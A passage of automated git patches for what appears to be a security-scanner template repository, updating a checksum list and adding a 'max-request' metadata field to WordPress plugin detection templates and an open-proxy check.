+http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6168,6 +6168,7 @@ http/vulnerabilities/other/seacms-sqli.yaml:052b91b996a94cf994e484e2f7fc89dad65c http/vulnerabilities/other/seowon-router-rce.yaml:87ffab8cf0b6a16ff367c867ff85393e465e6529 http/vulnerabilities/other/servicenow-helpdesk-credential.yaml:bcda3ec85d9430d886543afd053c6df1e8266d87 http/vulnerabilities/other/sick-beard-xss.yaml:2914e2859e9e5285409ab4357819862f0f0e6668 +http/vulnerabilities/other/sitemap-sql-injection.yaml:7422e5c7bfbd6e0ce3b82ff788c311f7c2e3948e http/vulnerabilities/other/siteminder-dom-xss.yaml:4ff5aff6fd516099bddce89f88f8cf5fdc07125d http/vulnerabilities/other/sl-studio-lfi.yaml:2c169f4eb245ceb6085091203c8bc20846a70b5c http/vulnerabilities/other/slims-xss.yaml:7e6bd25a7ce06bb760799dbdd6c50ffc76b32815 @@ -6450,7 +6451,6 @@ http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:e7e8bf6bd2bc78efd9ceb6d04b5f0 http/vulnerabilities/zend/zend-v1-xss.yaml:625c68da0d08d6c8a1381704b3861de7b6ffad6f http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:d81ad79707b746a46d8dbf3825df18da17aba5bf http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b2cca06ab -http/vulnerabilities /other/sitemap-sql-injection.yaml:7422e5c7bfbd6e0ce3b82ff788c311f7c2e3948e network/backdoor/backdoored-zte.yaml:1f2965cc0dedda1f861b7835e5778923b08c6a5f network/backdoor/vsftpd-backdoor.yaml:e3bd4879b5595dae69e0610aed33f24c77c28232 network/cves/2001/CVE-2001-1473.yaml:1b508a5adba955e833c48e50e2b2eac33282a525 @@ -6575,7 +6575,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:9179f70db97f4b273bdc0f020c54b5f6f33f8ad4 +templates-checksum.txt:2f8800bd2c70be367ddf890e7714a4bd14493311 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 4da7d1023199a46de1252d72761a1d2873254a81 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jul 2023 06:51:37 +0000 Subject: [PATCH 530/609] TemplateMan Update [Sat Jul 8 06:51:37 UTC 2023] :robot: --- http/misconfiguration/proxy/open-proxy-external.yaml | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cloudflare.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/photo-gallery.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/proxy/open-proxy-external.yaml b/http/misconfiguration/proxy/open-proxy-external.yaml index c4bc00ed94..455ce16f4e 100644 --- a/http/misconfiguration/proxy/open-proxy-external.yaml +++ b/http/misconfiguration/proxy/open-proxy-external.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.8 cwe-id: CWE-441 metadata: - max-request: 2 + max-request: 3 tags: exposure,config,proxy,misconfig http: diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml 